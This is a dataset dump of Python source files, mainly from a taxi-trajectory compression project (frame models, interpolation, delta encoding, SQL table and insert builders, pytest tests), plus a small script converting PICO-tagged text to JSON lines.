index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
78,121 | pumpkinduo/ELMO_sentence_encoder | refs/heads/master | /dataset_txt_to_json.py | import csv
import codecs
# Converts PICO_test.txt (pipe-separated tagged sentences, records separated by
# blank lines) into one JSON record per sentence: [tokens, tag, record_tokens].
# Accumulates one [tokens, tag, all-record-tokens] entry per data line.
datasets = []
# NOTE(review): file handle is never closed; prefer a `with` block.
f = open("PICO_test.txt")
i = 0
count = 0
g = f.readlines()
for line in g:
if line != "" and line != "\n":
count += 1
# Records are separated by blank lines; file[i] is the current record.
file = "".join(g).split("\n\n")
all_sentence = []
# print(i)
# Collect every token of the current record ("###" lines are headers).
for lines in file[i].split("\n"):
if not lines.startswith("###"):
ls2 = lines.split("|")
sentencess = ls2[2:]
sentencess = "".join(sentencess).strip().split(" ")
for word in sentencess:
if word != "":
all_sentence.append(word)
# Advance to the next record once all of its lines were counted.
if count > len(file[i].split("\n")):
i += 1
count = 0
dataset = []
sentencelist = []
# Data lines are pipe-separated: field 1 is the tag, fields 2+ the sentence.
if not line.startswith("###"):
line = "".join(line)
ls = line.split("|")
tag, sentence = ls[1], ls[2:]
sentence = "".join(sentence).strip()
sentence = sentence.split(" ")
for word in sentence:
sentencelist.append(word)
dataset.append(sentencelist)
dataset.append(tag)
dataset.append(all_sentence)
datasets.append(dataset)
# NOTE(review): removing items from `datasets` while iterating it skips the
# element after each removal; iterate a copy (datasets[:]) instead.
for j in datasets:
if j[0] == [""]:
datasets.remove(j)
print("数据加载完毕")
import json
# One JSON document per line (JSON Lines output).
with open("../PICO/testPICO.json","w",encoding="utf-8") as f:
for index,word in enumerate(datasets):
json.dump(datasets[index], f)
f.write("\n")
| {"/ELMO_sentence/train.py": ["/ELMO_sentence/data_util.py"]} |
78,122 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_sample.py | import datetime
from frame.models.sample import Sample
def test_frame_id():
    """frame_id counts the 30-second frame slots elapsed since midnight."""
    cases = [
        (datetime.datetime(2018, 1, 1, 0, 0, 0), 0),
        (datetime.datetime(2018, 1, 1, 0, 0, 30), 1),
        (datetime.datetime(2018, 1, 1, 0, 1, 29), 2),
        (datetime.datetime(2018, 1, 1, 1, 0, 0), 120),
        (datetime.datetime(2018, 1, 1, 1, 0, 30), 121),
        (datetime.datetime(2018, 1, 1, 23, 59, 59), 2879),
    ]
    for timestamp, expected in cases:
        assert Sample(timestamp, 0.0, 0.0, 0, 0).frame_id() == expected
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,123 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/get_trajectories_shark.py | from consts import DB_TABLE
def trajectory_in_group_range_sample_point(trajectory_id, first_group_id, last_group_id):
"""Build a UNION ALL query returning every decoded point (LON/LAT rows) of one trajectory within [first_group_id, last_group_id)."""
# NOTE(review): parameters are interpolated straight into the SQL text;
# acceptable for trusted internal ids, unsafe for untrusted input.
union_string = 'UNION ALL'
filter_string = f'''
WHERE FGID >= {first_group_id}
AND FGID < {last_group_id}
AND TID = {trajectory_id}'''
# First SELECT: the I-frame coordinates themselves.
sql = f'''
SELECT TID,
FGID,
Ix AS LON,
Iy AS LAT
FROM Taxi.{DB_TABLE}
{filter_string}
{union_string}
'''
# One SELECT per P-frame column pair (P1..P118): decode by adding the
# stored delta to the I-frame coordinates.
for i in range(1, 119):
sql += f'''
SELECT TID,
FGID,
Ix + P{i}x AS LON,
Iy + P{i}y AS LAT
FROM Taxi.{DB_TABLE}
{filter_string}
'''
# No trailing UNION ALL after the last SELECT.
sql += union_string if i < 118 else ''
return sql
def trajectories_in_group_range(first_group_id, last_group_id, trajectory_id=None):
"""Build a query selecting the I-frame plus all decoded P-frame columns for trajectories in [first_group_id, last_group_id), optionally filtered to one TID."""
sql = f'''
SELECT TID,
FGID,
Ix,
Iy,
'''
# Decode each P-frame pair by adding its delta to the I-frame coordinates.
for i in range(1, 119):
sql += f'''
Ix + P{i}x AS P{i}x,
Iy + P{i}y AS P{i}y
'''
# Comma between column pairs, none after the last (i == 118).
sql += ',' if i != 118 else ''
sql += f'''
FROM Taxi.{DB_TABLE}
WHERE FGID >= {first_group_id}
AND FGID < {last_group_id}
'''
# Optional per-trajectory filter; skipped when trajectory_id is falsy.
sql += f'AND TID = {trajectory_id}' if trajectory_id else ''
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,124 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/create_table.py | from consts import DB_TABLE
def get_create_table(frame_size):
"""Return CREATE TABLE DDL for the frame-group table: one I-frame column pair plus frame_size-1 delta (P-frame) column pairs."""
sql = f'''
CREATE COLUMN TABLE {DB_TABLE} (
trajectory_id INTEGER,
group_id INTEGER,
trip_id INTEGER,
occupancy BOOLEAN,
Ix DOUBLE,
Iy DOUBLE,'''
# One delta column pair per P-frame; comma after every pair but the last.
for i in range(1, frame_size):
p_frame = f'''
P{i}x DOUBLE,
P{i}y DOUBLE'''
last_frame = frame_size - 1
if i < last_frame:
p_frame += ','
sql += p_frame
sql += ')'
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,125 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_main.py | import datetime
from frame.__main__ import create_frames, create_frame_groups
from frame.frame_utils import add_padding, delta_encode
from frame.models.frame import Frame
from frame.models.frame_group import FrameGroup
def test_create_frames_groups_sample_in_same_minute():
    """Samples falling into distinct frame slots each produce their own frame."""
    samples = [(1, datetime.datetime(2017, 1, 1, 0, 0, 0), 100.0, 100.5, 0, 0),
               (1, datetime.datetime(2017, 1, 1, 0, 0, 30), 100.0, 100.5, 0, 0),
               (1, datetime.datetime(2017, 1, 1, 0, 0, 59), 100.0, 100.5, 0, 0),
               (1, datetime.datetime(2017, 1, 1, 0, 1, 0), 105.0, 105.5, 0, 0)]
    expected = [Frame(0, 100.0, 100.5), Frame(1, 100.0, 100.5), Frame(2, 105.0, 105.5)]
    assert create_frames(samples) == expected
def test_create_frames_interpolates_missing_frame():
    """A gap of one frame between samples is filled by linear interpolation."""
    samples = [(1, datetime.datetime(2017, 1, 1, 0, 0, 0), 100.0, 100.0, 0, 0),
               (1, datetime.datetime(2017, 1, 1, 0, 1, 0), 200.0, 200.0, 0, 0)]
    expected = [Frame(0, 100.0, 100.0), Frame(1, 150.0, 150.0), Frame(2, 200.0, 200.0)]
    assert create_frames(samples) == expected
def test_create_frames_does_not_interpolate_first_missing_frames():
    """Frames before the first sample are not synthesized."""
    samples = [(1, datetime.datetime(2017, 1, 1, 0, 3, 0), 100.0, 100.0, 0, 0)]
    assert create_frames(samples) == [Frame(6, 100.0, 100.0)]
def test_create_frames_does_not_interpolate_last_missing_frames():
    """Frames after the last sample are not synthesized."""
    samples = [(1, datetime.datetime(2017, 1, 1, 0, 57, 0), 100.0, 100.0, 0, 0)]
    assert create_frames(samples) == [Frame(114, 100.0, 100.0)]
# NOTE(review): this function is shadowed by an identically-named definition
# immediately below, so pytest never collects this version. Rename one of them.
def test_create_frames_performs_sed_to_select_samples_in_same_frame():
"""SED picks the most distant sample among those sharing a frame slot."""
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 100.0, 100.0, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 0), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 30), 200.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 59), 149.0, 104.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 3, 0), 150.0, 105.5, 0, 0)]
expected_frames = [Frame(1, 100.0, 100.0), Frame(2, 200.0, 100.5), Frame(3, 150.0, 105.5)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_performs_sed_to_select_samples_in_same_sub_minute_frame():
    """SED selection among samples 10-30 s apart within one frame slot.

    Renamed: this function previously carried the same name as the test
    above, so it shadowed it and pytest only ever collected this one.
    """
    trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 100.0, 100.0, 0, 0),
                  (1, datetime.datetime(2017, 1, 1, 0, 1, 30), 100.0, 100.5, 0, 0),
                  (1, datetime.datetime(2017, 1, 1, 0, 1, 40), 200.0, 100.5, 0, 0),
                  (1, datetime.datetime(2017, 1, 1, 0, 1, 59), 149.0, 104.5, 0, 0),
                  (1, datetime.datetime(2017, 1, 1, 0, 2, 0), 150.0, 105.5, 0, 0)]
    expected_frames = [Frame(2, 100.0, 100.0), Frame(3, 200.0, 100.5), Frame(4, 150.0, 105.5)]
    actual_frames = create_frames(trajectory)
    assert actual_frames == expected_frames
def test_create_frame_groups():
"""Frames are grouped and delta-encoded against the group's first frame."""
# NOTE(review): FrameGroup is constructed here with 4 arguments while
# FrameGroup.__init__ declares 6 (trip_id, occupancy missing), and Frame is
# built with 3 arguments vs the model's 4 -- this test appears out of sync
# with the models; verify before relying on it.
trajectory_id = 1
frames = [Frame(1, 100.0, 100.0), Frame(2, 200.0, 100.0), Frame(3, 150.0, 150.0)]
i_frame = Frame(1, 100.0, 100.0)
p_frames = [Frame(0, 0.0, 0.0), Frame(2, 100.0, 0.0), Frame(3, 50.0, 50.0)]
p_frames += [Frame(0, 0.0, 0.0)] * 56
expected_frame_groups = [FrameGroup(trajectory_id, 1, i_frame, p_frames)]
actual_frame_groups = create_frame_groups(trajectory_id, frames)
assert actual_frame_groups == expected_frame_groups
def test_add_padding_fills_missing_frames_for_n_minutes_at_beginning_and_end():
    """Placeholder frames are added before and after so the group holds n frames."""
    partial = [Frame(2, 200.0, 100.0), Frame(3, 150.0, 150.0)]
    expected = [Frame(0, 0.0, 0.0)] + partial + [Frame(0, 0.0, 0.0)] * 56
    assert add_padding(partial, 59) == expected
def test_add_no_padding_if_frame_is_full():
    """A group that already holds n frames comes back unchanged."""
    full = [Frame(1, 200.0, 100.0)] * 59
    assert add_padding(full, 59) == full
def test_add_full_padding_frame():
    """An empty group turns into n placeholder frames."""
    assert add_padding([], 59) == [Frame(0, 0, 0)] * 59
def test_delta_encoding():
    """Delta encoding stores a frame as its coordinate offset from the I-frame."""
    reference = Frame(1, 100.0, 100.0)
    assert delta_encode(reference, Frame(1, 150.0, 50.0)) == Frame(1, 50.0, -50.0)
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,126 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql_utils.py | from frame.sql.create_table import get_create_table
from frame.sql.frame_group import get_insert
def read_sql(file_name):
    """Return the entire contents of the SQL file at *file_name* as a string."""
    with open(file_name) as sql_file:
        contents = sql_file.read()
    return contents
def create_new_table(connection):
    """Issue the CREATE TABLE statement for a frame size of 30 on *connection*."""
    ddl = get_create_table(30)
    connection.execute(ddl)
def insert_frame_groups(connection, frame_groups):
    """Insert every frame group through *connection*, logging each insert to stdout."""
    for frame_group in frame_groups:
        statement = get_insert(frame_group)
        connection.execute(statement)
        print(f'Inserted frame group into db: {frame_group.trajectory_id}:{frame_group.frame_group_id}')
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,127 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/frame_utils.py | import numpy as np
from frame.models.frame import Frame
def interpolate_missing_frames(previous, following):
    """Linearly interpolate the frames missing between *previous* and *following*.

    Returns one Frame per missing id, with x/y interpolated and the occupancy
    carried over from *previous*.

    Raises AssertionError when the frames are adjacent (nothing to
    interpolate). The assert had been commented out although
    test_error_on_interpolating_subsequent_frames relies on it; restored.
    """
    assert (following.id - previous.id) > 1
    missing_ids = range(previous.id + 1, following.id)
    longitudes = np.interp(missing_ids, (previous.id, following.id), (previous.x, following.x))
    latitudes = np.interp(missing_ids, (previous.id, following.id), (previous.y, following.y))
    # Occupancy across the gap is carried over from the previous frame.
    return [Frame(missing_ids[i], longitudes[i], latitudes[i], previous.occupancy) for i in range(len(longitudes))]
def add_padding(frames, n):
"""Pad *frames* with placeholder Frame(0, None, None, 0) entries to exactly n frames."""
# NOTE(review): the leading-pad count uses `id % 15` while callers pad to
# n=30 (create_frame_groups) or n=59 (tests) -- confirm 15 is intentional
# and not a stale group size.
first_id = (frames[0].id % 15) if len(frames) > 0 else 0
padded_frames = []
padded_frames += [Frame(0, None, None, 0)] * first_id
padded_frames += frames
padded_frames += [Frame(0, None, None, 0)] * (n - len(padded_frames))
# Guard: the padded group must come out at exactly n frames.
assert len(padded_frames) == n
return padded_frames
def group_frames(frames, group_size):
    """Bucket frames by (group id, trip id, occupancy).

    A new trip starts whenever the occupancy flag flips or the frame falls
    into a different block of *group_size* frame ids. Returns a dict mapping
    (group_id, trip_id, occupancy) to the list of frames in that bucket.
    """
    buckets = {}
    trip_id = -1
    previous_occupancy = -1
    previous_group_id = -1
    for frame in frames:
        group_id = int(frame.id / group_size) + 1
        if previous_occupancy != frame.occupancy or previous_group_id != group_id:
            trip_id += 1
            previous_occupancy = frame.occupancy
            previous_group_id = group_id
        buckets.setdefault((group_id, trip_id, frame.occupancy), []).append(frame)
    return buckets
def delta_encode(i_frame, frame):
    """Return *frame* expressed as an offset from *i_frame*.

    Padding frames (x is None on either side) are passed through unchanged.
    """
    if i_frame.x is None or frame.x is None:
        return frame
    dx = frame.x - i_frame.x
    dy = frame.y - i_frame.y
    return Frame(frame.id, dx, dy, frame.occupancy)
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,128 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_sample_utils.py | import datetime
from frame.models.sample import Sample
from frame.sample_utils import _euclidean_distance, sample_with_highest_sed
def test_euclidean_distance():
    """Axis-aligned, 3-4-5, and negative-coordinate distances."""
    cases = [((0, 0, 5, 0), 5), ((4, 0, 0, 0), 4), ((0, 0, 4, 3), 5), ((0, 0, -4, -3), 5)]
    for args, expected in cases:
        assert _euclidean_distance(*args) == expected
def test_sample_with_highest_sed():
    """The candidate with the largest synchronized Euclidean distance wins."""
    previous = Sample(datetime.time(0, 0, 0), 0, 0, 0, 0)
    following = Sample(datetime.time(0, 2, 0), 5, 5, 0, 0)
    winner = Sample(datetime.time(0, 1, 10), 1, 10, 0, 0)
    candidates = [winner,
                  Sample(datetime.time(0, 1, 30), 2.5, 2.5, 0, 0),
                  Sample(datetime.time(0, 1, 45), 3, 3, 0, 0)]
    assert sample_with_highest_sed(candidates, previous, following) == winner
def test_sample_with_highest_sed_single_sample():
    """A lone candidate is returned as-is."""
    previous = Sample(datetime.time(0, 0, 0), 0, 0, 0, 0)
    following = Sample(datetime.time(0, 2, 0), 5, 5, 0, 0)
    only = Sample(datetime.time(0, 1, 10), 1, 10, 0, 0)
    assert sample_with_highest_sed([only], previous, following) == only
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,129 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/frame.py | class Frame:
def __init__(self, id: int, x: float, y: float, occupancy: int):
"""One frame: slot id, position, and occupancy flag."""
self.id = id
# x/y are used as longitude/latitude by callers (see interpolate_missing_frames);
# after delta encoding they hold offsets from the group's I-frame.
self.x = x
self.y = y
# occupancy: 0/1 flag carried through grouping and delta encoding
self.occupancy = occupancy
def __eq__(self, other):
    """Attribute-wise equality against instances of a compatible class."""
    if not isinstance(self, other.__class__):
        return False
    return self.__dict__ == other.__dict__
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,130 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/frame_group.py | from consts import DB_TABLE
from frame.models.frame_group import FrameGroup
def get_insert(frame_group: FrameGroup):
"""Return the INSERT statement for one frame group: ids, occupancy, the I-frame coordinates, then every delta-encoded P-frame pair."""
# Missing I-frame coordinates are stored as 0 (the string '0' formats the same).
x = '0' if frame_group.i_frame.x is None else frame_group.i_frame.x
y = '0' if frame_group.i_frame.y is None else frame_group.i_frame.y
# NOTE(review): frame_group.occupancy is a Python bool and renders as
# True/False in the SQL text; confirm the target DB accepts that literal.
sql = f'''
INSERT INTO {DB_TABLE} VALUES (
{frame_group.trajectory_id},
{frame_group.frame_group_id},
{frame_group.trip_id},
{frame_group.occupancy},
{x},
{y},'''
# Padding P-frames (x is None) become SQL NULLs; comma after all but the last.
for i, frame in enumerate(frame_group.p_frames):
x = 'NULL' if frame.x is None else frame.x
y = 'NULL' if frame.y is None else frame.y
p_frame = f'''{x},
{y}'''
last_frame = len(frame_group.p_frames) - 1
if i < last_frame:
p_frame += ','
sql += p_frame
sql += ')'
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,131 | VolkerSchiewe/tuk_3 | refs/heads/master | /consts.py | DB_TABLE = 'SHENZHEN_SHARK_DB_30'
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,132 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/tracker.py | class Tracker:
def __init__(self):
"""Zeroed counters for sample/frame processing statistics."""
# raw input samples seen
self.samples = 0
# frames emitted
self.frames = 0
# running total of samples folded into emitted frames (used for the average)
self.samples_per_frame = 0
# frames synthesized by interpolation
self.frames_interpolated = 0
def track_sample(self):
"""Count one raw input sample."""
self.samples += 1
def track_frame(self, samples):
"""Count one emitted frame that was built from *samples* raw samples."""
self.frames += 1
self.samples_per_frame += samples
def track_interpolated_frames(self, frames):
"""Count *frames* frames that were created by interpolation."""
self.frames_interpolated += frames
def print(self):
print(f'Tracked {self.samples} samples, {self.frames_interpolated} frames were interpolated, '
f'{self.samples_per_frame / self.frames} samples per frame were found.')
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,133 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/frame_group.py | from frame.models.frame import Frame
class FrameGroup:
    """One I-frame plus its delta-encoded P-frames for a trajectory segment."""

    def __init__(self, trajectory_id: int, frame_group_id: int, trip_id: int, occupancy: int, i_frame: Frame,
                 p_frames: [Frame]):
        self.trajectory_id = trajectory_id
        self.frame_group_id = frame_group_id
        self.trip_id = trip_id
        # normalized to bool even when callers pass 0/1
        self.occupancy = bool(occupancy)
        self.i_frame = i_frame
        self.p_frames = p_frames

    def __eq__(self, other):
        """Attribute-wise equality against instances of a compatible class."""
        if not isinstance(self, other.__class__):
            return False
        return self.__dict__ == other.__dict__
